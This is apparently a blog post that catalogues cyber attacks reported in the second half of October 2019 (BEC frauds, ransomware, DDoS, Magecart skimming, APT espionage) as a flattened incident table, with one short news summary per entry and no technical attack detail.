And with this post I finally publish the second timeline of October (the first one is here) covering the main cyber attacks occurred in the second half (plus a couple of events that occurred in September but where not included in the previous timeline). For the records in this second fortnight I have collected 75 events.
As usual the timeline is rich of events, some of them with huge implications, and I really don’t know where to start from. In terms of Cyber Crime, BEC scammers are continuously raising the bar: the American subsidiary of Nikkei has lost roughly $29 millions after an employee transferred the money to a bank account under the control of the attackers. The city of Ocala suffered the same fate, but with “minor” consequences, “only” $742,000 redirected to the scammers’ bank account. Other important events include the breach to Web.com, the discovery of more than 1.3 million Indian payment card details up for sale, a breach to Unicredit, and a massive DDoS attack crippling AWS.
And while ransomware gangs are always extremely active (the City of Johannesburg is the most important victim of this timeline), the cyber espionage front is equally hot: APT29 were back after an apparent break, APT 28, APT41, and Turla are always extremely active, CCleaner has suffered another compromise attempt from alleged Chinese threat actors, and the Czech Republic has unearthed an alleged cyber espionage plot from Russia.
For the complete list, you need to browse the entire timeline, and don’t forget to share it to support my work and spread the concept of risk awareness across the community. Of course feel free to contribute, suggesting noticeable cyber events, and do not forget to follow @paulsparrows on Twitter, or even connect on Linkedin, for the latest updates.
ID
Date
Author
Target
Description
Attack
Target Class
Attack Class
Country
Link
Tags
1
17/9/2019
?
Magellan Health
Magellan Health issues a statement saying two of its subsidiaries - National Imaging Associates and Magellan Healthcare - "discovered a potential data breach related to a phishing attack.
Account Hijacking
Q Human health and social work activities
CC
US
Magellan Health
2
27/9/2019
?
Meridian Lightweight Technologies
Meridian Lightweight Technologies, a supplier of lightweight magnesium for car parts, is hit by a ransomware attack.
Malware
C Manufacturing
CC
CA
Meridian Lightweight Technologies, ransomware
3
16/10/2019
?
Web.com
Web.com, the parent company of world's first domain registrar Network Solutions discloses a security breach occurred in August 2019. A third-party infiltrated some of the company's systems. Even Register.com is affected.
Unknown
J Information and communication
CC
US
Web.com, Network Solutions, Register.com
4
16/10/2019
?
Single individuals
Researchers from Check Point reveal that the Phorpiex botnet earned $115,000 in five months just from mass-spamming sextortion emails.
Malicious Spam
X Individual
CC
>1
Check Point, Phorpiex
5
16/10/2019
?
Financial Institutions
Researchers from Proofpoint discover two new malware strains distributed via phishing campaigns carried out by the TA505 hacking group during the last two months, a new downloader dubbed Get2 and an undocumented remote access Trojan (RAT) named SDBbot.
Targeted Attack
K Financial and insurance activities
CC
>1
Proofpoint, TA505, Get2, SDBbot
6
16/10/2019
?
Unsecured Docker Hosts
Researchers from Palo Alto discover Graboid, a new cryptojacking campaign using Docker images to deliver a worm that follows a seemingly erratic plan where the miner is active for about four minutes at a time on an infected host.
Malware
Y Multiple Industries
CC
>1
Palo Alto Networks, Graboid
7
16/10/2019
?
International airport in Europe
Researchers from Cyberbit uncover a large infection of cryptominers at an unnamed "international airport in Europe".
Malware
H Transportation and storage
CC
N/A
Cyberbit, Crypto, Europe
8
16/10/2019
?
Undisclosed Target
BlackBerry Cylance Threat Researchers discover the obfuscated malicious code of a miner embedded within WAV audio files.
Malware
Z Unknown
CC
N/A
BlackBerry Cylance, steganography
9
16/10/2019
?
WordPress sites
Researchers from Sucuri discover a number of compromised websites containing a plugin called “wpframework, planted by bad actors to gain and maintain unauthorized access to the site environment and mine cryptocurrency.
Malicious WordPress plugins
Y Multiple Industries
CC
>1
Sucuri, wpframework, WordPress
10
17/10/2019
Cozy Bear AKA APT29, The Dukes
Ministries of Foreign Affairs in at least three different countries in Europe and Washington, DC embassy of a European Union country
Researchers from ESET discover Operation Ghost, a new campaign carried out by the Russian Cozy Bear malicious actor.
Targeted Attack
O Public administration and defence, compulsory social security
CE
>1
ESET, Cozy Bear, APT29, The Dukes
11
17/10/2019
?
Billtrust
U.S. financial services provider Billtrust experiences an outage affecting all of its services after some of the company's computing systems are impacted by a malware attack allegedly caused by the BitPaymer ransomware.
Malware
K Financial and insurance activities
CC
US
Billtrust, BitPaymer, ransomware
12
17/10/2019
?
Stripe users
A phishing campaign using fake invalid account Stripe support alerts as lures is spotted while attempting to harvest customers' bank account info and user credentials using booby-trapped Stripe customer login pages.
Account Hijacking
K Financial and insurance activities
CC
>1
Stripe
13
17/10/2019
?
WordPress sites
Researchers from Sucuri discover a new wave of infections that install fake plugins with backdoor functionality.
Malicious WordPress plugins
Y Multiple Industries
CC
>1
WordPress, Sucuri
14
17/10/2019
?
Single individuals
The Spelevo exploit kit is spotted infecting victims with Maze Ransomware payloads via a new malicious campaign that exploits the Flash Player CVE-2018-15982 vulnerability.
The Universiti Malaya E-Pay Cashless Payment and Records portal is hacked but no data is compromised apparently.
Unknown
P Education
CC
MY
Universiti Malaya
16
18/10/2019
?
Russian-speaking Dark Web users.
Researchers from ESET discover a trojanized Tor Browser distributed by cybercriminals to steal bitcoins from darknet market buyers.
Malware
X Individual
CC
RU
ESET, Tor, Dark Web, Crypto
17
20/10/2019
?
NordVPN
NordVPN is compromised as the private keys for their web site certificate are publicly leaked on the Internet The company confirms the breach was discovered on March 2018.
Third-Party vulnerability
S Other service activities
CC
PA
NordVPN
18
20/10/2019
?
TorGuard
TorGuard also confirms to have suffered a breach in September 2017.
Unknown
S Other service activities
CC
US
TorGuard
19
20/10/2019
?
VikingVPN
OpenVPN keys and configuration files from VikingVPN are also leaked online.
Unknown
S Other service activities
CC
US
VikingVPN
20
20/10/2019
?
San Bernardino City Unified School District
The San Bernardino City Unified School District is knocked offline by a ransomware attack.
Malware
P Education
CC
US
San Bernadino City Unified School District, ransomware
21
21/10/2019
Russia?
Czech Republic
Czech government officials reveal that they dismantled a Russian cyber-espionage network operating in the country. The attack occurred in March.
Targeted Attack
O Public administration and defence, compulsory social security
CE
CZ
Russia, Czech Republic
22
21/10/2019
Winnti AKA APT41
Multiple Targets
Researchers from ESET reveals that chinese cyberspies from the Winnti group have developed a malware that alters Microsoft SQL Server (MSSQL) databases and creates a backdoor mechanism that can let the attackers access.
Targeted Attack
Y Multiple Industries
CE
>1
Winnti, APT41, MSSQL, Microsoft SQL
23
21/10/2019
Turla
Organizations in at least 20 different countries
British security officials reveal that the Russian group, known as “Turla” has hijacked the infrastructure of the Iranian APT34 group to successfully hack organizations in at least 20 different countries over the last 18 months.
Targeted Attack
Y Multiple Industries
CE
>1
Turla, APT34
24
21/10/2019
Attackers from China?
Avast
Avast discloses a security breach that impacted its internal network. The attack's purpose was to insert malware into the CCleaner software, similar to the 2017 incident. The breach occurred because the attacker compromised an employee's VPN credentials.
Account Hijacking
M Professional scientific and technical activities
CE
CZ
Avast, Ccleaner
25
21/10/2019
?
Single individuals
Researchers at Fortinet uncover a new Remcos campaign – with the new variant titled "2.5.0 Pro".
Malware
X Individual
CC
>1
Fortinet, Remcos
26
22/10/2019
?
Amazon Web Services, AWS
Amazon Web Services (AWS) suffers a major DDoS attack that makes it unavailable for some customers.
DDoS
J Information and communication
CC
>1
Amazon Web Services, AWS
27
22/10/2019
?
Lottomatica
Lottomatica is hit by a DDoS attack. The attack lasts for more than two weeks.
DDoS
R Arts entertainment and recreation
CC
IT
Lottomatica
28
22/10/2019
?
Kalispell Regional Healthcare
Kalispell Regional Healthcare notifies nearly 130,000 patients whose personal information may have been compromised after a phishing attack occurred in May 2019.
Account Hijacking
Q Human health and social work activities
CC
US
Kalispell Regional Healthcare
29
22/10/2019
?
Multiple Targets
A new ransomware called MedusaLocker is being actively distributed and victims have been seen from all over the world.
Malware
Y Multiple Industries
CC
>1
MedusaLocker, ransomware
30
22/10/2019
?
Chilean Carabineros
The Chilean Carabineros are hacked and the attackers leak 10,000 sensitive files.
Unknown
O Public administration and defence, compulsory social security
H
CL
Carabineros
31
22/10/2019
?
Pine County
Pine County says that around 4,400 people may have their data breached after a county employee had their email account accessed by unauthorized personnel.
Account Hijacking
O Public administration and defence, compulsory social security
CC
US
Pine County
32
23/10/2019
?
Multiple Targets
The US Federal Bureau of Investigation issues a warning for the US private sector about Magecart attacks.
Malicious Script Injection
Y Multiple Industries
CC
US
FBI, Magecart
33
23/10/2019
?
Discord users
A new malware named Spidey Bot, is targeting Discord users by modifying the Windows Discord client so that it is transformed into a backdoor and an information-stealing Trojan.
Malware
X Individual
CC
>1
Spidey Bot, Discord
34
24/10/2019
?
Human rights organizations across the world, including the Red Cross, UNICEF, the UN World Food and the UN Development programs
Researchers from Lookout reveal that over the past few months, a pervasive spear-phishing campaign has hit some human rights organizations across the world, including the Red Cross, UNICEF, and the UN World Food and the UN Development programs.
Account Hijacking
U Activities of extraterritorial organizations and bodies
CE
N/A
Lookout, Red Cross, UNICEF, UN World Food Program, UN Development program
35
24/10/2019
?
Companies in the financial sector
Three different security companies (Group-IB, Link11, and Radware) reveal that a group of criminals has been launching DDoS attacks against companies in the financial sector and demanding ransom payments while posing as "Fancy Bear".
DDoS
K Financial and insurance activities
CC
>1
Group-IB, Link11, Radware, Fancy Bear
36
24/10/2019
Shadow Kill Hackers
City of Johannesburg
The City of Johannesburg shuts down its website and billing systems after a group hacked into the authority’s system and demanded a ransom of four Bitcoins worth about $30,000.
Malware
O Public administration and defence, compulsory social security
CC
ZA
City of Johannesburg, Shadow Kill Hackers, ransomware
37
24/10/2019
?
iOS users
Researchers from Wandera discover 17 malicious iPhone apps infected with iOS Clicker. The apps click on adverts secretly, generating income for cyber criminals.
Malware
X Individual
CC
>1
Wandera, iOS, iOS Clicker
38
24/10/2019
?
Single individuals
Researchers at Cybereason reveal the details of Raccoon, a new malware as a service platform, gaining increasing popularity across cyber criminals.
Malware
X Individual
CC
>1
Cybereason, Raccoon
39
25/10/2019
?
South African Banks
The South African Banking Risk Information Centre (SABRIC) announces that the South African banking industry has been hit by a wave of DDoS attacks targeting consumer-facing services.
DDoS
K Financial and insurance activities
CC
ZA
South African Banking Risk Information Centre, SABRIC
40
25/10/2019
?
Single individuals
A new ransomware has been discovered called FuxSocy that borrows much of its behavior from the notorious and now-defunct Cerber Ransomware.
Malware
X Individual
CC
>1
FuxSocy, ransomware
41
25/10/2019
?
Procter & Gamble's First Aid Beauty
Hackers in May planted an e-skimmer on Procter & Gamble's site First Aid Beauty, still stealing payment card. The MageCart script selects its victims from the US.
Malicious Script Injection
G Wholesale and retail trade
CC
US
Procter & Gamble's First Aid Beauty, Magecart
42
25/10/2019
?
Betty Jean Kerr People’s Health Centers
Betty Jean Kerr People’s Health Centers, a was hit last September by a ransomware attack that continues to prevent access to data collected from patients, health care providers and employees.
Malware
Q Human health and social work activities
CC
US
Betty Jean Kerr People’s Health Centers, ransomware
43
26/10/2019
?
Vulnerable PHP Servers
Threat intelligence firm Bad Packets reveals that a recently patched security flaw in modern versions of PHP (CVE-2019-11043) is being exploited in the wild to take over servers.
CVE-2019-11043 vulnerability
Y Multiple Industries
CC
>1
Bad Packets, PHP, CVE-2019-11043
44
27/10/2019
?
Multiple Targets in Turkey
Turkish officials confirm that cyberattacks which targeted Türk Telekom and Garanti BBVA, among many others, were behind the nationwide disruption in internet traffic.
DDoS
Y Multiple Industries
CC
TR
Türk Telekom, Garanti BBVA
45
28/10/2019
APT28 AKA Fancy Bear, Strontium
16 national and international sporting and anti-doping organizations
Microsoft reveals that APT28 has targeted at least 16 national and international sporting and anti-doping organizations ahead of next year's Tokyo Olympics.
Targeted Attack
U Activities of extraterritorial organizations and bodies
CE
>1
Microsoft, APT28, Tokyo, Fancy Bear, Strontium
46
28/10/2019
?
More than 2,000 websites in Georgia
A huge cyber-attack knocks out more than 2,000 websites in the country of Georgia after Pro-Service, a local hosting provider is breached. In many cases, home pages were replaced with an image of former President Mikheil Saakashvili, and the caption "I'll be back".
Unknown
Y Multiple Industries
H
GE
Mikheil Saakashvili, Pro-Service
47
28/10/2019
?
UniCredit
UniCredit uncover a data breach involving the personal records of 3 million domestic clients from a compromised 2015 file.
Unknown
K Financial and insurance activities
CC
IT
UniCredit
48
28/10/2019
?
Sixth June
French fashion online store Sixth June is infected some time ago with code that steals payment card info at checkout.
Malicious Script Injection
G Wholesale and retail trade
CC
FR
Sixth June, Magecart
49
28/10/2019
?
City of Ocala
The City of Ocala in Florida falls victim to a business email compromise scam (BEC) that ends with redirecting over $742,000 to a bank account controlled by the fraudster(s).
BEC
O Public administration and defence, compulsory social security
CC
US
City of Ocala
50
28/10/2019
?
Krystal
U.S. fast-food restaurant chain Krystal discloses a security incident involving one of is payment processing systems and affecting some of its restaurants between July and September 2019.
PoS Malware
I Accommodation and food service activities
CC
US
Krystal
51
28/10/2019
SWEED
Precision engineering companies in Italy
Researcher Marco Ramilli discovers a campaign against precision engineering companies in Italy.
Targeted Attack
P Education
CE
IT
Marco Ramilli, SWEED
52
28/10/2019
?
WordPress and Blogger sites
In a new campaign, scammers are hacking into WordPress and Blogger sites and using the hacked accounts to create posts stating that the blogger's computer has been hacked and that they were recorded while using adult web sites.
Unknown
X Individual
CC
>1
WordPress, Blogger
53
28/10/2019
?
American Cancer Society
A Magecart attack is detected in the American Cancer Society online store.
Malicious Script Injection
Q Human health and social work activities
CC
US
American Cancer Society
54
29/10/2019
?
Indian users
Researchers from Group-IB discover more than 1.3 million Indian payment card details put up for sale on Joker's Stash, the internet's largest carding shop.
Unknown
K Financial and insurance activities
CC
IN
Group-IB, Joker's Stash
55
29/10/2019
?
Android users
Researchers from Symantec observe a surge in detections for xHelper, a persistent malicious Android application that can hide itself from users, download additional malicious apps, and display advertisements. XHelper has infected over 45,000 devices in the past six months.
Malware
X Individual
CC
>1
Symantec, Android, XHelper
56
29/10/2019
?
Multiple Targets
Researchers from Menlo Security discover a new variant of the Adwind RAT, delivered via an obfuscated initial JAR file.
Malware
Y Multiple Industries
CC
>1
Menlo Security, Adwind
57
29/10/2019
?
Bed Bath & Beyond
Bed Bath & Beyond discloses that an unauthorized party obtained login information for some of its customers (1% of customer base).
Unknown
G Wholesale and retail trade
CC
US
Bed Bath & Beyond
58
29/10/2019
?
Italian users
The Maze Ransomware is conducting a new spam campaign that targets Italian users by pretending to be the country's Tax and Revenue Agency.
Malware
X Individual
CC
IT
Maze, Italy, Tax and Revenue Agency
59
29/10/2019
?
Las Cruces Public Schools
A ransomware attack hits Las Cruces Public Schools and forces the district to shut down the entire computer system to contain the infection.
Malware
P Education
CC
US
Las Cruces Public Schools, ransomware
60
29/10/2019
?
Prisma Health
Prisma Health discloses a cyber attack after an employee falls victim of a phishing attack.
Account Hijacking
Q Human health and social work activities
CC
US
Prisma Health
61
30/10/2019
?
Nikkei America
Nikkei loses roughly 29 million dollars after an employee of the Nikkei America subsidiary is tricked by scammers to send the funds to a bank account they controlled.
BEC
J Information and communication
CC
US
Nikkei America
62
30/10/2019
Lazarus Group
Nuclear Power Corporation of India Ltd (NPCIL)
Nuclear Power Corporation of India Ltd (NPCIL) confirms that the network of a nuclear power plants was infected with malware. Several security researchers identify the malware as a version of DTrack, a backdoor trojan developed by the Lazarus Group.
Targeted Attack
D Electricity gas steam and air conditioning supply
CE
IN
Nuclear Power Corporation of India Ltd, NPCIL, DTrack, Lazarus Group.
63
30/10/2019
Russia?
Madagascar, Central African Republic, Mozambique, Democratic Republic of the Congo, Côte d'Ivoire, Cameroon, Sudan and Libya
Facebook removes a network of Russian-run accounts which it says were attempting to interfere in politics in Madagascar, Central African Republic, Mozambique, Democratic Republic of the Congo, Côte d'Ivoire, Cameroon, Sudan and Libya.
Fake Social Networks Accounts
O Public administration and defence, compulsory social security
CW
>1
Facebook, Russia, Madagascar, Central African Republic, Mozambique, Democratic Republic of the Congo, Côte d'Ivoire, Cameroon, Sudan, Libya
64
30/10/2019
?
Marriott International
Marriott International notifies some of its associates of an incident that exposed their social security numbers (SSNs) to an unknown party who may have accessed the information from the network of an unnamed vendor.
Unknown
I Accommodation and food service activities
CC
US
Marriott International
65
30/10/2019
?
Multiple Targets
Researchers from McAfee Labs observe a new phishing campaign using a fake voicemail message to lure victims into entering their Office 365 email credentials.
Account Hijacking
Y Multiple Industries
CE
>1
McAfee, Office 365
66
30/10/2019
?
Android users
Researchers at Upstream reveal that a keyboard app called ai.type previously available on the Play Store has been making millions of unauthorized purchases of premium digital content. The Android app has been downloaded more than 40 million times.
Malware
X Individual
CC
>1
Upstream, Play Store, ai.type
67
30/10/2019
?
Ontario Science Centre
A third-party email vendor for the Ontario Science Centre suffers a data breach exposing some PII of 174,000 of the Centre’s members, donors and customers. The breach occurred on August 16
Account Hijacking
Q Human health and social work activities
CC
CA
Ontario Science Centre
68
31/10/2019
?
Chrome users
Google discloses a Chrome 0-day vulnerability exploited in the wild (CVE-2019-13720) within the Operation WizardOpium discovered by researchers from Kaspersky Lab.
Researchers from FireEye discover a new malware family used by APT41, named MESSAGETAP, designed to monitor and save SMS traffic from specific phone numbers, IMSI numbers and keywords for subsequent theft.
Targeted Attack
J Information and communication
CE
N/A
FireEye, APT41, MESSAGETAP
70
31/10/2019
Hidden Cobra AKA Lazarus Group
Multiple targets in the US
The Department of Homeland Security, FBI, and Department of Defense release a notification on Hoplight, a new data collector malware being used by the North Korean cyberespionage group Hidden Cobra (aka Lazarus).
Targeted Attack
Y Multiple Industries
CE
US
Department of Homeland Security, FBI, Department of Defense, Hoplight, Hidden Cobra, Lazarus
71
31/10/2019
?
Winamax
Winamax is hit by a DDoS attack.
DDoS
R Arts entertainment and recreation
CC
FR
Winamax
72
31/10/2019
?
QNAP NAS devices
Hackers infect thousands of network-attached storage (NAS) devices from Taiwanese vendor QNAP with a new strain of malware named QSnatch. Over 7,000 infections have been reported in Germany alone.
Malware
Y Multiple Industries
CC
>1
QNAP, QSnatch
73
31/10/2019
?
Vulnerable ZYXEL P660HN-T1A routers
Researchers from Palo Alto Networks discover a new variant of the Gafgyt botnet targeting vulnerable ZYXEL P660HN-T1A routers exploiting CVE-2017-18368.
Researchers from Cofense discover a new phishing campaign, trying to trick the victims into handing out their Microsoft Office 365 account credentials via a fake salary increase Excel sheet.
Account Hijacking
Y Multiple Industries
CC
>1
Cofense
75
31/10/2019
?
Single individuals
A new Emotet campaign celebrates Halloween by pushing out new spam templates that want to invite the victim to a party.
Malware
X Individual
CC
>1
Emotet
76
31/10/2019
Calypso APT
State institutions in India, Brazil, Kazakhstan, Russia, Thailand and Turkey
Researchers at Positive Technologies reveal that a Chinese-speaking APT group, Calypso, has actively been targeting state institutions in six countries.
Targeted Attack
O Public administration and defence, compulsory social security
CE
>1
Positive Technologies, Calypso, India, Brazil, Kazakhstan, Russia, Thailand, Turkey
77
31/10/2019
?
Utah Valley Eye Center
Hackers access the Utah Valley Eye Center third-party portal (DemandForce) that reminds patients of scheduled appointments and send emails to inform patients they had received payment from PayPal. The incident occurred on June 18, 2018.
